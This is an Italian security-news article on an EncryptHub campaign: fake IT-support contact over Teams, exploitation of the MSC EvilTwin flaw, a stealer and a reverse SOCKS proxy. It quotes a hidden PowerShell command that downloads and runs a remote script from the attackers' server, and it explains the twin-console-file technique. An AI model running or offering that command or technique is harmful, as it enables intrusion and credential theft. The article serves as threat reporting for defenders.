Hai risposto su Teams al supporto IT? Complimenti! Il Trojan è nel PC con diritti superiori ai tuoi

Il team di ricerca di Trustwave SpiderLabs ha identificato una nuova ondata di attacchi EncryptHub che combinano l’errore umano e lo sfruttamento di una vulnerabilità nella Microsoft Management Console. Gli operatori si spacciano per personale di supporto, contattano il personale tramite Microsoft Teams e poi convincono il “cliente” ad aprire l’accesso remoto ed eseguire una serie di comandi, per poi distribuire il payload del bug CVE-2025-26633, nota come MSC EvilTwin.

Parallelamente, il gruppo utilizza canali di distribuzione non standard, tra cui la piattaforma di supporto Brave, il che complica il filtraggio del traffico e l’analisi degli incidenti. I report riportano anche altri nomi dello stesso team: LARVA-208 e Water Gamayun; in precedenza, il gruppo era stato associato ad attacchi contro sviluppatori Web3 e abusi della piattaforma Steam e, a febbraio, erano 618 le organizzazioni compromesse in tutto il mondo.

Il primo passo è l’ingegneria sociale . La vittima riceve una richiesta Teams da un “addetto IT”, dopodiché l’interlocutore offre insistentemente di avviare una sessione remota e “controllare le impostazioni“. Una volta stabilita la sessione, sulla macchina viene eseguita una riga come questa:

Avvio delle iscrizioni al corso Cyber Offensive Fundamentals Vuoi smettere di guardare tutorial e iniziare a capire davvero come funziona la sicurezza informatica? La base della sicurezza informatica, al di là di norme e tecnologie, ha sempre un unico obiettivo: fermare gli attacchi dei criminali informatici. Pertanto "Pensa come un attaccante, agisci come un difensore". Ti porteremo nel mondo dell'ethical hacking e del penetration test come nessuno ha mai fatto prima. Per informazioni potete accedere alla pagina del corso oppure contattarci tramite WhatsApp al numero 379 163 8765 oppure scrivendoci alla casella di posta [email protected]. Supporta Red Hot Cyber attraverso:  L'acquisto del fumetto sul Cybersecurity Awareness Ascoltando i nostri Podcast Seguendo RHC su WhatsApp Seguendo RHC su Telegram Scarica gratuitamente “Byte The Silence”, il fumetto sul Cyberbullismo di Red Hot Cyber Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì.

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://cjhsbam[.]com/payload/runner.ps1’ | Invoke-Expression”

Questa chiamata scarica ed esegue lo script runner.ps1, che prepara un trampolino di lancio per sfruttare la vulnerabilità MMC.

Poi arriva il trucco con i file .msc doppi. Il loader crea due file di console con lo stesso nome: una copia “pulita” viene posizionata nella directory prevista e una copia dannosa viene posizionata nel percorso MUIPath, solitamente la directory en-US. Quando viene avviato lo snap-in legittimo, viene visualizzato il processo mmc.exe e, a causa del bug MSC EvilTwin, cerca prima il file con lo stesso nome in MUIPath. Di conseguenza, il sistema rileva il “mirror” da en-US ed esegue il codice degli aggressori. Sebbene la falla sia stata pubblicamente descritta come zero-day nel marzo 2025, campioni di tali file sono stati riscontrati in attacchi attivi già a febbraio; esiste una patch, ma la ricezione funziona ancora sulle stazioni non patchate.

Dopo aver disposto i doppi, runner.ps1 modifica il contenuto dello snap-in dannoso: il segnaposto htmlLoaderUrl viene sostituito con l’indirizzo del nodo di comando e controllo di EncryptHub, una stringa del tipo hxxps://cjhsbam[.]com/payload/build[.]ps1. Dopo aver ricevuto il collegamento, .msc esegue la fase successiva.

Lo script build.ps1 raccoglie i “finger” di sistema e li invia a C2, registra il meccanismo di esecuzione automatica, gestisce il canale di comunicazione e attende l’esecuzione dell’attività. I comandi vengono ricevuti in forma crittografata (AES), decrittografati localmente ed eseguiti direttamente sul nodo tramite Invoke-Expression. Tra i moduli tipici c’è linfostealer PowerShell Fickle Stealer, che estrae file sensibili, informazioni sull’ambiente e dati del portafoglio crittografico.

Durante l’indagine, sono emersi ulteriori strumenti Go, con i quali gli operatori stanno gradualmente sostituendo gli script di PowerShell. Uno di questi, SilentCrystal, replica la logica del bootloader, ma è compresso in un binario nativo. Innanzitutto, viene creata una cartella di pseudo-sistema “C:WindowsSystem32” con uno spazio dopo la parola Windows, che copia visivamente la directory reale e confonde gli strumenti di sicurezza. Quindi, il campione invia un POST al server di controllo con una “chiave API” hard-coded e un nome file casuale con estensione .zip; in risposta, viene inviato un collegamento legittimo al supporto Brave.

Ai principianti non è consentito caricare allegati su questo sito, il che significa che EncryptHub ha un account con diritti di caricamento. L’archivio dal supporto Brave viene scaricato e decompresso, dopodiché il segnaposto {URI} in WF.msc viene sostituito con l’indirizzo del centro di comando. Successivamente, viene avviato lo standard .msc e, grazie a CVE-2025-26633 , la console rileva la sostituzione dalla directory “false”, eseguendo il codice richiesto.

Un’altra scoperta interessante è un “proxy bookmark” in Go con supporto SOCKS5. Senza parametri, si avvia come client, si connette all'”hosting” degli aggressori utilizzando i dettagli hardcoded nel binario e devia il traffico in un tunnel. Esiste anche una modalità server: viene caricato un file con i dati di autenticazione, viene generato automaticamente un certificato TLS autofirmato (il campo Common Name contiene la riga Reverse Socks e il nome DNS è localhost), dopodiché il processo inizia ad accettare più connessioni, parallelizzando l’elaborazione tramite goroutine. Quando viene stabilita una connessione, l’agente accede a Telegram con lo stato “start”, dove sostituisce il nome utente, il dominio dalla variabile d’ambiente USERDOMAIN, il risultato della verifica dei diritti amministrativi tramite una chiamata di sessione di rete, nonché l’IP pubblico, il geotag e il provider su richiesta a https://ipinfo.io/json . L’analisi dell’infrastruttura ha mostrato richieste di payload su hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, un altro tassello nel quadro di C2.

Ti è piaciuto questo articolo? Ne stiamo discutendo nella nostra Community su LinkedIn, Facebook e Instagram. Seguici anche su Google News, per ricevere aggiornamenti quotidiani sulla sicurezza informatica o Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.

Redazione

La redazione di Red Hot Cyber è composta da professionisti del settore IT e della sicurezza informatica, affiancati da una rete di fonti qualificate che operano anche in forma riservata. Il team lavora quotidianamente nell’analisi, verifica e pubblicazione di notizie, approfondimenti e segnalazioni su cybersecurity, tecnologia e minacce digitali, con particolare attenzione all’accuratezza delle informazioni e alla tutela delle fonti. Le informazioni pubblicate derivano da attività di ricerca diretta, esperienza sul campo e contributi provenienti da contesti operativi nazionali e internazionali.